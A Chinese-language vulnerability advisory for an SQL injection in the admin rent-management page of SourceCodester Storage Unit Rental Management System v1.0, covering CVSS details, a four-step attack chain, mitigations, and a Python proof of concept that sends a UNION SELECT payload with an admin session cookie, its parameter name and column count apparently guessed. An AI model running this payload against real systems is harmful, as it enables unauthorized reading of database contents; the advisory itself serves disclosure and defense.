CVE-2026-37590: 存储租赁管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-37590

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Storage Unit Rental Management System

漏洞概述

SourceCodester Storage Unit Rental Management System v1.0 版本在处理特定文件请求时存在安全隐患。具体而言，文件 `/storage/admin/rents/manage_rent.php` 未能正确过滤外部输入的数据，导致系统容易受到 SQL 注入攻击。由于该漏洞位于管理员后台模块，利用门槛相对较高，需要攻击者具备高权限。然而，一旦被利用，攻击者可能通过构造特殊的 SQL 语句读取数据库中的敏感信息，从而对系统的机密性构成威胁。建议相关用户尽快排查系统版本并采取相应措施。

技术细节

该漏洞的核心原理在于应用程序未能对用户输入进行严格的边界检查，直接将其嵌入到 SQL 查询语句中执行。具体到本案例，受影响文件为 `/storage/admin/rents/manage_rent.php`，该文件通常用于处理租赁记录的查询或管理操作。当攻击者发送包含恶意的 SQL 片段（如单引号、注释符或 UNION 查询）的请求时，后端数据库会将这些输入作为代码的一部分执行。由于 CVSS 评分显示权限要求为高（PR:H），这意味着攻击者首先需要获取管理员账户的访问权限。在此基础上，攻击者可以利用该漏洞绕过认证逻辑的限制，直接查询数据库表结构，提取用户哈希、配置信息或其他业务数据。虽然完整性（I）和可用性（A）未受影响，但机密性（C）的泄露已足以造成严重后果。修复此类漏洞的标准做法是使用预编译语句或 ORM 框架。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是 SourceCodester Storage Unit Rental Management System v1.0，并确定管理员入口点。

STEP 2

获取初始访问权限

由于 CVSS 向量为 PR:H，攻击者需要通过暴力破解、钓鱼或利用其他漏洞获取管理员账户凭证。

STEP 3

漏洞利用

攻击者使用管理员会话访问 `/storage/admin/rents/manage_rent.php`，并在参数中注入恶意 SQL 代码（例如 UNION SELECT）。

STEP 4

数据窃取

数据库执行恶意查询，将敏感数据（如用户信息、密码哈希）包含在 HTTP 响应中返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-37590
# Target: SourceCodester Storage Unit Rental Management System v1.0
# File: /storage/admin/rents/manage_rent.php
# Description: SQL Injection vulnerability requiring high privileges.

import requests

def check_sqli(target_url, cookie):
    """
    Checks if the target is vulnerable to SQL Injection.
    Note: Replace 'id' with the actual parameter name if different.
    """
    # Payload to test for time-based or error-based injection
    # Example: ' OR SLEEP(5)-- -
    payload = "?id=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Cookie": cookie
    }
    
    try:
        response = requests.get(target_url + payload, headers=headers, timeout=10)
        
        # Analyze response
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the response content for database errors or leaked data (e.g., '2', '3' appearing in text).")
            print(response.text[:500]) # Print first 500 chars for analysis
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Usage requires the target URL and a valid admin session cookie
    target = "http://target.com/storage/admin/rents/manage_rent.php"
    admin_cookie = "PHPSESSID=admin_session_id_here; user=admin"
    
    print("[*] Starting PoC check for CVE-2026-37590...")
    check_sqli(target, admin_cookie)

影响范围

SourceCodester Storage Unit Rental Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议在 Web 应用防火墙（WAF）中部署规则，拦截针对 `/storage/admin/rents/manage_rent.php` 的异常 SQL 请求。同时，应严格限制管理员账户的访问来源 IP，并加强对系统后台的异常行为监控，以防止潜在的权限提升和数据泄露风险。